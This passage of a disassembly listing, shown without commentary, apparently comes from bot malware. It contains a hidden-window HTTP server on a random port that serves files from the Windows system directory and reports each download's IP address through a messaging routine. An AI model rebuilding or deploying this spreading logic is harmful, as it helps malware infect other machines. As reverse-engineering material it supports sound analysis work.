call sub_402710
leave
retn 4
sub_41829C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_418301 proc near ; DATA XREF: .text:0041BF7C�o
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
push esi
push edi
call sub_418DA0
mov edi, dword_426598
mov esi, dword_42659C
loc_41831A: ; CODE XREF: sub_418301+5A�j
call sub_418DA0
cmp dword_42659C, esi
jl short loc_418344
jg short loc_418331
cmp dword_426598, edi
jbe short loc_418344
loc_418331: ; CODE XREF: sub_418301+26�j
cmp byte_4269C0, 0
jz short loc_418344
push offset dword_4269BC
call sub_41829C
loc_418344: ; CODE XREF: sub_418301+24�j
; sub_418301+2E�j ...
mov edi, dword_426598
mov esi, dword_42659C
push 0C350h
call ds:dword_41D0FC ; Sleep
jmp short loc_41831A
sub_418301 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41835D proc near ; CODE XREF: sub_418AEB+1E�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push offset word_426694
push dword_4267AC
mov [ebp+var_4], 10h
call ds:dword_41D234 ; accept
leave
retn
sub_41835D endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41837F(char *Str)
sub_41837F proc near ; CODE XREF: sub_418552+1D2�p
Str = dword ptr 4
jmp short loc_418384
; ---------------------------------------------------------------------------
loc_418381: ; CODE XREF: sub_41837F+14�j
mov byte ptr [eax], 5Ch
loc_418384: ; CODE XREF: sub_41837F�j
push 2Fh ; Val
push [esp+4+Str] ; Str
call _strchr
test eax, eax
pop ecx
pop ecx
jnz short loc_418381
retn
sub_41837F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418396(char *Str)
sub_418396 proc near ; CODE XREF: sub_418552+192�p
var_C = byte ptr -0Ch
var_8 = dword ptr -8
Dest = byte ptr -4
var_2 = byte ptr -2
Str = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+Str]
mov eax, esi
push edi
lea ecx, [eax+1]
loc_4183A7: ; CODE XREF: sub_418396+16�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4183A7
sub eax, ecx
inc eax
push eax ; unsigned int
call j_??2@YAPAXI@Z ; operator new(uint)
mov ebx, eax
push ebx ; void *
call __msize
push eax ; size_t
push 0 ; int
push ebx ; void *
call _memset
push 25h ; Val
push esi ; Str
call _strchr
add esp, 1Ch
test eax, eax
jnz short loc_418420
loc_4183D7: ; CODE XREF: sub_418396+114�j
mov eax, esi
mov edx, esi
loc_4183DB: ; CODE XREF: sub_418396+4A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4183DB
mov edi, ebx
sub eax, edx
dec edi
loc_4183E7: ; CODE XREF: sub_418396+57�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4183E7
mov ecx, eax
shr ecx, 2
mov esi, edx
mov edx, [ebp+Str]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov edi, edx
stosd
mov eax, ebx
sub edx, ebx
loc_41840B: ; CODE XREF: sub_418396+7D�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_41840B
xor esi, esi
inc esi
jmp loc_4184B1
; ---------------------------------------------------------------------------
loc_41841D: ; CODE XREF: sub_418396+10E�j
mov eax, [ebp+var_8]
loc_418420: ; CODE XREF: sub_418396+3F�j
mov byte ptr [eax], 0
mov ecx, esi
loc_418425: ; CODE XREF: sub_418396+94�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_418425
sub ecx, esi
mov edi, ebx
mov edx, ecx
dec edi
loc_418433: ; CODE XREF: sub_418396+A3�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_418433
mov ecx, edx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
inc eax
push 2 ; Count
push eax ; Source
mov [ebp+var_8], eax
lea eax, [ebp+Dest]
push eax ; Dest
rep movsb
call _strncpy
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+Dest]
push offset asc_4204B4 ; "%x"
push eax ; char *
mov [ebp+var_2], 0
call _sscanf
add esp, 18h
test eax, eax
jz short loc_4184AF
mov eax, ebx
lea esi, [eax+1]
loc_41847B: ; CODE XREF: sub_418396+EA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41847B
mov cl, [ebp+var_C]
sub eax, esi
mov esi, [ebp+var_8]
add esi, 2
push 25h ; Val
push esi ; Str
mov [eax+ebx], cl
mov byte ptr [eax+ebx+1], 0
call _strchr
test eax, eax
pop ecx
pop ecx
mov [ebp+var_8], eax
jnz loc_41841D
jmp loc_4183D7
; ---------------------------------------------------------------------------
loc_4184AF: ; CODE XREF: sub_418396+DE�j
xor esi, esi
loc_4184B1: ; CODE XREF: sub_418396+82�j
push ebx ; Memory
call j_j__free
pop ecx
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_418396 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4184BF proc near ; CODE XREF: sub_418552+A1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov [eax], esi
mov eax, [ebp+arg_4]
push edi
mov [eax], esi
mov eax, [ebp+arg_8]
push offset asc_42049C ; "\r\n"
push esi ; Str
mov [ebx], esi
mov [eax], esi
call _strstr
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_4184EB
loc_4184E7: ; CODE XREF: sub_4184BF+52�j
; sub_4184BF+69�j ...
xor eax, eax
jmp short loc_41854F
; ---------------------------------------------------------------------------
loc_4184EB: ; CODE XREF: sub_4184BF+26�j
push offset asc_4204A0 ; " "
push esi ; Str
mov byte ptr [edi], 0
call _strtok
mov ecx, [ebp+arg_0]
push offset asc_4204A4 ; " "
push 0 ; Str
mov [ecx], eax
call _strtok
add esp, 10h
test eax, eax
mov [ebx], eax
jz short loc_4184E7
push offset asc_4204A8 ; " "
push 0 ; Str
call _strtok
test eax, eax
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
jz short loc_4184E7
mov ecx, [ebp+arg_8]
lea eax, [edi+2]
cmp byte ptr [eax], 0
mov [ecx], eax
jz short loc_41854C
push offset asc_4204AC ; "\r\n\r\n"
push eax ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_4184E7
mov byte ptr [eax+2], 0
loc_41854C: ; CODE XREF: sub_4184BF+76�j
xor eax, eax
inc eax
loc_41854F: ; CODE XREF: sub_4184BF+2A�j
pop edi
pop ebp
retn
sub_4184BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=0CA8h
sub_418552 proc near ; CODE XREF: sub_418AEB+28�p
var_D28 = dword ptr -0D28h
Str = dword ptr -0D24h
Memory = dword ptr -0D20h
var_D1C = dword ptr -0D1Ch
var_D18 = byte ptr -0D18h
var_D14 = byte ptr -0D14h
var_D13 = byte ptr -0D13h
var_D12 = byte ptr -0D12h
var_D11 = byte ptr -0D11h
var_D08 = byte ptr -0D08h
var_D07 = byte ptr -0D07h
Dest = byte ptr -908h
var_907 = byte ptr -907h
var_508 = byte ptr -508h
var_507 = byte ptr -507h
Str2 = byte ptr -108h
var_107 = byte ptr -107h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-0CA8h]
sub esp, 0D28h
mov eax, dword_423064
xor eax, ebp
mov [ebp+0CA8h+var_4], eax
push ebx
push esi
mov esi, 3FFh
xor ebx, ebx
push esi ; size_t
lea eax, [ebp+0CA8h+var_907]
push ebx ; int
push eax ; void *
mov [ebp+0CA8h+Dest], bl
call _memset
push esi ; size_t
lea eax, [ebp+0CA8h+var_507]
push ebx ; int
push eax ; void *
mov [ebp+0CA8h+var_508], bl
call _memset
push 103h ; size_t
lea eax, [ebp+0CA8h+var_107]
push ebx ; int
push eax ; void *
mov [ebp+0CA8h+Str2], bl
call _memset
push esi ; size_t
lea eax, [ebp+0CA8h+var_D07]
push ebx ; int
push eax ; void *
mov [ebp+0CA8h+var_D08], bl
call _memset
add esp, 30h
push ebx
push 400h
lea eax, [ebp+0CA8h+var_D08]
push eax
push [ebp+0CA8h+arg_0]
call ds:dword_41D270 ; recv
mov [ebp+eax+0CA8h+var_D08], bl
lea eax, [ebp+0CA8h+var_D1C]
push eax
lea eax, [ebp+0CA8h+Memory]
push eax
lea eax, [ebp+0CA8h+var_D28]
push eax
lea ebx, [ebp+0CA8h+Str]
lea esi, [ebp+0CA8h+var_D08]
call sub_4184BF
add esp, 0Ch
test eax, eax
jz loc_418AD4
mov esi, [ebp+0CA8h+var_D28]
push edi
push 4
mov edi, offset aGet ; "GET"
pop ecx
xor eax, eax
repe cmpsb
jz loc_4186E0
push offset aQue? ; "Que?"
mov esi, 3FFh
lea eax, [ebp+0CA8h+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+0CA8h+Dest]
add esp, 0Ch
lea edx, [eax+1]
loc_41863C: ; CODE XREF: sub_418552+EF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41863C
sub eax, edx
xor ebx, ebx
mov [ebp+eax+0CA8h+Dest], bl
lea eax, [ebp+0CA8h+Dest]
lea ecx, [eax+1]
loc_418657: ; CODE XREF: sub_418552+10A�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_418657
sub eax, ecx
push eax
push offset aHttp1_1501NotI ; "HTTP/1.1 501 Not Implemented\r\nContent-L"...
lea eax, [ebp+0CA8h+var_508]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+0CA8h+var_508]
add esp, 10h
lea ecx, [eax+1]
loc_41867F: ; CODE XREF: sub_418552+132�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41867F
sub eax, ecx
mov [ebp+eax+0CA8h+var_508], bl
lea eax, [ebp+0CA8h+var_508]
lea ecx, [eax+1]
loc_418698: ; CODE XREF: sub_418552+14B�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_418698
mov esi, ds:dword_41D228
push ebx
sub eax, ecx
push eax
lea eax, [ebp+0CA8h+var_508]
push eax
push [ebp+0CA8h+arg_0]
call esi ; send
lea eax, [ebp+0CA8h+Dest]
lea ecx, [eax+1]
loc_4186C1: ; CODE XREF: sub_418552+174�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_4186C1
push ebx
sub eax, ecx
push eax
lea eax, [ebp+0CA8h+Dest]
push eax
push [ebp+0CA8h+arg_0]
call esi ; send
jmp loc_418AC7
; ---------------------------------------------------------------------------
loc_4186E0: ; CODE XREF: sub_418552+C1�j
mov edi, [ebp+0CA8h+Str]
push edi ; Str
call sub_418396
test eax, eax
pop ecx
jz loc_418AD3
mov eax, edi
lea edx, [eax+1]
loc_4186F7: ; CODE XREF: sub_418552+1AA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4186F7
sub eax, edx
cmp eax, 1
jbe loc_418849
inc edi
push 2Fh ; Val
push edi ; Str
call _strchr
mov esi, eax
xor ebx, ebx
cmp esi, ebx
pop ecx
pop ecx
jz loc_4187A6
mov [esi], bl
inc esi
push esi ; Str
call sub_41837F
push ebx ; Val
push esi ; Str
call _strchr
add esp, 0Ch
cmp [esi], bl
jz short loc_41876F
cmp byte ptr [eax-1], 5Ch
jz short loc_41876F
push esi
push edi
push offset dword_4266A8
push offset aSSS_2 ; "%s\\%s\\%s"
lea eax, [ebp+0CA8h+Str2]
push 103h ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+0CA8h+Str2]
add esp, 18h
lea esi, [eax+1]
loc_418766: ; CODE XREF: sub_418552+219�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418766
jmp short loc_4187D5
; ---------------------------------------------------------------------------
loc_41876F: ; CODE XREF: sub_418552+1E3�j
; sub_418552+1E9�j
push offset dword_4268B8
push esi
push edi
push offset dword_4266A8
push offset aSSSS ; "%s\\%s\\%s%s"
lea eax, [ebp+0CA8h+Str2]
push 103h ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+0CA8h+Str2]
add esp, 1Ch
lea esi, [eax+1]
loc_41879D: ; CODE XREF: sub_418552+250�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41879D
jmp short loc_4187D5
; ---------------------------------------------------------------------------
loc_4187A6: ; CODE XREF: sub_418552+1C8�j
push edi
push offset dword_4266A8
push offset aSS_8 ; "%s\\%s"
lea eax, [ebp+0CA8h+Str2]
push 103h ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+0CA8h+Str2]
add esp, 14h
lea esi, [eax+1]
loc_4187CE: ; CODE XREF: sub_418552+281�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4187CE
loc_4187D5: ; CODE XREF: sub_418552+21B�j
; sub_418552+252�j
sub eax, esi
mov [ebp+eax+0CA8h+Str2], bl
lea eax, [ebp+0CA8h+Str2]
push eax ; Str2
push offset Str1 ; Str1
call __stricmp
test eax, eax
pop ecx
pop ecx
jz short loc_41884B
mov esi, 200h
push esi ; Size
call _malloc
push esi ; size_t
mov edi, eax
push ebx ; int
push edi ; void *
mov [ebp+0CA8h+Memory], edi
call _memset
add esp, 10h
push offset aQue?_0 ; "Que?"
push edi ; void *
call __msize
pop ecx
dec eax
push eax ; Count
push edi ; Dest
call __snprintf
mov eax, edi
add esp, 0Ch
lea esi, [eax+1]
loc_41882C: ; CODE XREF: sub_418552+2DF�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41882C
sub eax, esi
mov [eax+edi], bl
mov eax, edi
lea esi, [eax+1]
loc_41883D: ; CODE XREF: sub_418552+2F0�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41883D
jmp loc_41892E
; ---------------------------------------------------------------------------
loc_418849: ; CODE XREF: sub_418552+1B1�j
xor ebx, ebx
loc_41884B: ; CODE XREF: sub_418552+2A1�j
push ebx
push ebx
push 3
push ebx
push 1
push 80000000h
lea eax, [ebp+0CA8h+Str2]
push eax
call ds:dword_41D06C ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+0CA8h+Str], esi
jz short loc_4188DF
push ebx
push esi
call ds:dword_41D070 ; GetFileSize
mov edi, eax
push edi ; Size
mov [ebp+0CA8h+var_D1C], edi
call _malloc
push edi ; size_t
push ebx ; int
push eax ; void *
mov [ebp+0CA8h+Memory], eax
call _memset
add esp, 10h
push ebx
push ebx
push ebx
push esi
mov esi, ds:dword_41D074
call esi ; SetFilePointer
push ebx
lea eax, [ebp+0CA8h+var_D28]
push eax
push edi
mov edi, ds:dword_41D078
jmp short loc_4188D1
; ---------------------------------------------------------------------------
loc_4188A9: ; CODE XREF: sub_418552+389�j
cmp [ebp+0CA8h+var_D28], ebx
jnz loc_418933
push [ebp+0CA8h+var_D1C] ; size_t
push ebx ; int
push [ebp+0CA8h+Memory] ; void *
call _memset
add esp, 0Ch
push ebx
push ebx
push ebx
push [ebp+0CA8h+Str]
call esi ; SetFilePointer
push ebx
lea eax, [ebp+0CA8h+var_D28]
push eax
push [ebp+0CA8h+var_D1C]
loc_4188D1: ; CODE XREF: sub_418552+355�j
push [ebp+0CA8h+Memory]
push [ebp+0CA8h+Str]
call edi ; ReadFile
test eax, eax
jnz short loc_4188A9
jmp short loc_418933
; ---------------------------------------------------------------------------
loc_4188DF: ; CODE XREF: sub_418552+31A�j
mov esi, 200h
push esi ; Size
call _malloc
push esi ; size_t
mov edi, eax
push ebx ; int
push edi ; void *
mov [ebp+0CA8h+Memory], edi
call _memset
add esp, 10h
push offset aQue?_1 ; "Que?"
push edi ; void *
call __msize
pop ecx
dec eax
push eax ; Count
push edi ; Dest
call __snprintf
mov eax, edi
add esp, 0Ch
lea esi, [eax+1]
loc_418916: ; CODE XREF: sub_418552+3C9�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418916
sub eax, esi
mov [eax+edi], bl
mov eax, edi
lea esi, [eax+1]
loc_418927: ; CODE XREF: sub_418552+3DA�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418927
loc_41892E: ; CODE XREF: sub_418552+2F2�j
sub eax, esi
mov [ebp+0CA8h+var_D1C], eax
loc_418933: ; CODE XREF: sub_418552+35A�j
; sub_418552+38B�j
push 400h ; size_t
lea eax, [ebp+0CA8h+var_508]
push ebx ; int
push eax ; void *
call _memset
push [ebp+0CA8h+var_D1C]
lea eax, [ebp+0CA8h+var_508]
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 ok\r\nContent-Length: %d\r\nCo"...
push 3FFh ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+0CA8h+var_508]
add esp, 1Ch
lea esi, [eax+1]
loc_41896A: ; CODE XREF: sub_418552+41D�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41896A
sub eax, esi
mov [ebp+eax+0CA8h+var_508], bl
lea eax, [ebp+0CA8h+var_508]
lea esi, [eax+1]
loc_418983: ; CODE XREF: sub_418552+436�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418983
sub eax, esi
mov esi, ds:dword_41D228
push ebx
push eax
lea eax, [ebp+0CA8h+var_508]
push eax
push [ebp+0CA8h+arg_0]
call esi ; send
test eax, eax
jz loc_418ABE
push ebx
push [ebp+0CA8h+var_D1C]
push [ebp+0CA8h+Memory]
push [ebp+0CA8h+arg_0]
call esi ; send
test eax, eax
jz loc_418ABE
lea eax, [ebp+0CA8h+Str2]
push eax ; Str2
push offset Str1 ; Str1
call __stricmp
test eax, eax
pop ecx
pop ecx
jnz loc_418ABE
push 100h ; unsigned int
call j_??2@YAPAXI@Z ; operator new(uint)
mov esi, eax
push esi ; void *
call __msize
push eax
mov ebx, offset dword_424ED0
call sub_4196D1
xor eax, eax
lea edi, [ebp+0CA8h+var_D18]
stosd
stosd
stosd
add esp, 0Ch
stosd
lea eax, [ebp+0CA8h+Str]
push eax
lea eax, [ebp+0CA8h+var_D18]
push eax
push [ebp+0CA8h+arg_0]
mov [ebp+0CA8h+Str], 10h
call ds:dword_41D248 ; getpeername
movzx eax, [ebp+0CA8h+var_D11]
movzx ecx, [ebp+0CA8h+var_D12]
shl eax, 8
add eax, ecx
movzx ecx, [ebp+0CA8h+var_D13]
shl eax, 8
add eax, ecx
movzx ecx, [ebp+0CA8h+var_D14]
shl eax, 8
add eax, ecx
push 2
mov [ebp+0CA8h+var_D1C], eax
push 4
lea eax, [ebp+0CA8h+var_D1C]
push eax
call ds:dword_41D280 ; gethostbyaddr
test eax, eax
push dword_433940
jnz short loc_418A86
movzx eax, [ebp+0CA8h+var_D11]
push eax
movzx eax, [ebp+0CA8h+var_D12]
push eax
movzx eax, [ebp+0CA8h+var_D13]
push eax
movzx eax, [ebp+0CA8h+var_D14]
push eax ; Args
push offset aHttpTransferD_ ; "HTTP: Transfer: %d.%d.%d.%d (N/A). %d T"...
push esi ; int
push 0 ; char
push offset dword_4269BC ; int
call sub_417361
add esp, 24h
jmp short loc_418AB1
; ---------------------------------------------------------------------------
loc_418A86: ; CODE XREF: sub_418552+507�j
push dword ptr [eax]
movzx eax, [ebp+0CA8h+var_D11]
push eax
movzx eax, [ebp+0CA8h+var_D12]
push eax
movzx eax, [ebp+0CA8h+var_D13]
push eax
movzx eax, [ebp+0CA8h+var_D14]
push eax ; Args
push offset aHttpTransfer_0 ; "HTTP: Transfer: %d.%d.%d.%d (%s). %d To"...
push esi ; int
push 0 ; char
push offset dword_4269BC ; int
call sub_417361
add esp, 28h
loc_418AB1: ; CODE XREF: sub_418552+532�j
inc dword_433940
push esi ; Memory
call j_j__free
pop ecx
loc_418ABE: ; CODE XREF: sub_418552+453�j
; sub_418552+46A�j ...
push [ebp+0CA8h+Memory] ; Memory
call _free
pop ecx
loc_418AC7: ; CODE XREF: sub_418552+189�j
push [ebp+0CA8h+arg_0]
call ds:dword_41D224 ; closesocket
loc_418AD3: ; CODE XREF: sub_418552+19A�j
pop edi
loc_418AD4: ; CODE XREF: sub_418552+AB�j
mov ecx, [ebp+0CA8h+var_4]
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 0CA8h
leave
retn
sub_418552 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418AEB proc near ; DATA XREF: sub_418C40+27�o
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 401h
jz short loc_418AFE
pop ebp
jmp ds:dword_41D200
; ---------------------------------------------------------------------------
loc_418AFE: ; CODE XREF: sub_418AEB+A�j
mov eax, [ebp+arg_C]
dec eax
jz short loc_418B10
sub eax, 7
jnz short loc_418B19
call sub_41835D
jmp short loc_418B19
; ---------------------------------------------------------------------------
loc_418B10: ; CODE XREF: sub_418AEB+17�j
push [ebp+arg_8]
call sub_418552
pop ecx
loc_418B19: ; CODE XREF: sub_418AEB+1C�j
; sub_418AEB+23�j
xor eax, eax
pop ebp
retn 10h
sub_418AEB endp
; =============== S U B R O U T I N E =======================================
sub_418B1F proc near ; CODE XREF: sub_418C40+9B�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, 104h
push edi ; size_t
xor ebp, ebp
push ebp ; int
mov ebx, offset dword_4266A8
push ebx ; void *
call _memset
push edi ; size_t
push ebp ; int
mov esi, offset dword_4268B8
push esi ; void *
call _memset
push edi ; size_t
push ebp ; int
mov ebp, offset Str1
push ebp ; void *
call _memset
add esp, 24h
push edi
push ebx
call ds:dword_41D0F4 ; GetSystemDirectoryA
push edi
mov ebx, offset byte_425061
call sub_4196D1
push esi
push offset dword_4266A8
push offset aSS_9 ; "%s\\%s"
push 103h ; Count
push ebp ; Dest
call __snprintf
mov eax, ebp
add esp, 18h
lea ecx, [eax+1]
loc_418B85: ; CODE XREF: sub_418B1F+6B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_418B85
push 0
push 1
sub eax, ecx
push 2
mov Str1[eax], dl
call ds:dword_41D27C ; socket
cmp eax, 0FFFFFFFFh
mov dword_4267AC, eax
jnz short loc_418BB8
push eax
loc_418BAB: ; CODE XREF: sub_418B1F+E7�j
call ds:dword_41D224 ; closesocket
xor eax, eax
jmp loc_418C3B
; ---------------------------------------------------------------------------
loc_418BB8: ; CODE XREF: sub_418B1F+89�j
mov eax, 0FFDCh
mov ebx, 3E8h
call sub_4192C7
push eax
mov dword_426594, eax
mov word_426694, 2
call ds:dword_41D278 ; htons
and dword_426698, 0
push 10h
push offset word_426694
push dword_4267AC
mov word_426696, ax
call ds:dword_41D26C ; bind
test eax, eax
jz short loc_418C08
loc_418C00: ; CODE XREF: sub_418B1F+102�j
; sub_418B1F+114�j
push dword_4267AC
jmp short loc_418BAB
; ---------------------------------------------------------------------------
loc_418C08: ; CODE XREF: sub_418B1F+DF�j
push 9
push 401h
push [esp+18h+arg_0]
push dword_4267AC
call ds:dword_41D22C ; WSAAsyncSelect
test eax, eax
jnz short loc_418C00
push 4
push dword_4267AC
call ds:dword_41D230 ; listen
test eax, eax
jnz short loc_418C00
inc eax
mov byte_4268B4, al
loc_418C3B: ; CODE XREF: sub_418B1F+94�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_418B1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418C40 proc near ; DATA XREF: sub_418D17+21�o
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 50h
mov eax, dword_4266A4
push ebx
mov ebx, ds:dword_41D1F4
push esi
push edi
mov edi, 7F00h
push edi
xor esi, esi
push esi
mov [ebp+var_3C], eax
mov [ebp+var_28], offset dword_4255BC
mov [ebp+var_48], offset sub_418AEB
mov [ebp+var_4C], 8
mov [ebp+var_50], 30h
call ebx ; LoadIconA
push edi
push esi
mov [ebp+var_38], eax
call ebx ; LoadIconA
push edi
push esi
mov [ebp+var_24], eax
call ds:dword_41D20C ; LoadCursorA
mov [ebp+var_34], eax
lea eax, [ebp+var_50]
push eax
mov [ebp+var_2C], esi
mov [ebp+var_44], esi
mov [ebp+var_40], esi
mov [ebp+var_30], 1
call ds:dword_41D1F0 ; RegisterClassExA
test ax, ax
jz short loc_418D0E
push esi
push dword_4266A4
mov eax, 80000000h
push esi
push esi
push esi
push esi
push eax
push eax
push 0CF0000h
push offset asc_420364 ; " "
push offset dword_4255BC
push esi
call ds:dword_41D1FC ; CreateWindowExA
push eax
call sub_418B1F
test eax, eax
pop ecx
jz short loc_418D0E
mov edi, ds:dword_41D208
jmp short loc_418D01
; ---------------------------------------------------------------------------
loc_418CED: ; CODE XREF: sub_418C40+CC�j
lea eax, [ebp+var_20]
push eax
call ds:dword_41D1F8 ; TranslateMessage
lea eax, [ebp+var_20]
push eax
call ds:dword_41D204 ; DispatchMessageA
loc_418D01: ; CODE XREF: sub_418C40+AB�j
push esi
push esi
push esi
lea eax, [ebp+var_20]
push eax
call edi ; GetMessageA
test eax, eax
jnz short loc_418CED
loc_418D0E: ; CODE XREF: sub_418C40+70�j
; sub_418C40+A3�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_418C40 endp
; =============== S U B R O U T I N E =======================================
sub_418D17 proc near ; CODE XREF: sub_401F1C+70�p
; .text:0041BFC8�p
push 4
mov eax, offset __ehhandler$?empty@locale@std@@SA?AV12@XZ_0
call __EH_prolog3
push 8 ; Size
call ??2@YAPAXI@Z ; operator new(uint)
mov esi, eax
pop ecx
mov [ebp-10h], esi
and dword ptr [ebp-4], 0
test esi, esi
jz short loc_418D4B
push offset sub_418C40
xor ecx, ecx
mov edi, offset aHs ; "HS"
call sub_4140AB
jmp short loc_418D4D
; ---------------------------------------------------------------------------
loc_418D4B: ; CODE XREF: sub_418D17+1F�j
xor eax, eax
loc_418D4D: ; CODE XREF: sub_418D17+32�j
cmp dword ptr [eax+4], 0
setnz al
call __EH_epilog3
retn
sub_418D17 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_418D5A proc near ; CODE XREF: sub_4192C7:loc_4192EB�p
mov eax, dword_4265B0
mov edx, dword_4265B4
lea ecx, ds:4265B8h[eax*4]
push esi
mov esi, eax
mov eax, dword_4265B8[edx*4]
add eax, [ecx]
and eax, 3FFFFFFFh
inc esi
cmp esi, 37h
mov [ecx], eax
jnz short loc_418D87
xor esi, esi
loc_418D87: ; CODE XREF: sub_418D5A+29�j
inc edx
cmp edx, 37h
jnz short loc_418D8F
xor edx, edx
loc_418D8F: ; CODE XREF: sub_418D5A+31�j
mov dword_4265B0, esi
mov dword_4265B4, edx
sar eax, 6
pop esi
retn
sub_418D5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418DA0 proc near ; CODE XREF: sub_401CC0+125�p
; sub_41748B:loc_41759C�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
lea eax, [ebp+var_10]
push eax
call ds:dword_41D058 ; QueryPerformanceCounter
test eax, eax
jz short loc_418E1C
lea eax, [ebp+var_8]
push eax
call ds:dword_41D064 ; QueryPerformanceFrequency
test eax, eax
jz short loc_418E1C
push [ebp+var_4]
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
call __alldiv
push 0
push 15180h
push edx
push eax
call __alldvrm
push 0
push 0E10h
push ebx
push ecx
mov dword_426598, eax
mov dword_42659C, edx
call __alldvrm
push 0
push 3Ch
push ebx
push ecx
mov dword_4265A0, eax
mov dword_4265A4, edx
call __alldiv
mov dword_4265A8, eax
mov dword_4265AC, edx
loc_418E1C: ; CODE XREF: sub_418DA0+13�j
; sub_418DA0+21�j
pop ebx
leave
retn
sub_418DA0 endp
; =============== S U B R O U T I N E =======================================
sub_418E1F proc near ; CODE XREF: sub_401CC0+EF�p
; sub_41748B+BC�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0] ; size_t
push 0 ; int
push esi ; void *
call _memset
add esp, 0Ch
cmp [esp+arg_4], 0
push [esp+arg_0]
push esi
jz short loc_418E41
push 1002h
jmp short loc_418E43
; ---------------------------------------------------------------------------
loc_418E41: ; CODE XREF: sub_418E1F+19�j
push 7
loc_418E43: ; CODE XREF: sub_418E1F+20�j
push 800h
call ds:dword_41D054 ; GetLocaleInfoA
mov eax, esi
retn
sub_418E1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
; int __fastcall sub_418E51(unsigned int,char)
sub_418E51 proc near ; CODE XREF: sub_401CC0+DA�p
; sub_41748B+8B�p ...
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, dword_423064
xor eax, ebp
mov [ebp+74h+var_4], eax
push ebx
push edi
lea eax, [ebp+74h+var_98]
push eax
mov ebx, ecx
mov [ebp+74h+var_98], 94h
call ds:dword_41D068 ; GetVersionExA
push ebx ; size_t
xor edi, edi
push edi ; int
push esi ; void *
call _memset
add esp, 0Ch
cmp [ebp+74h+var_94], 6
jnz short loc_418E9A
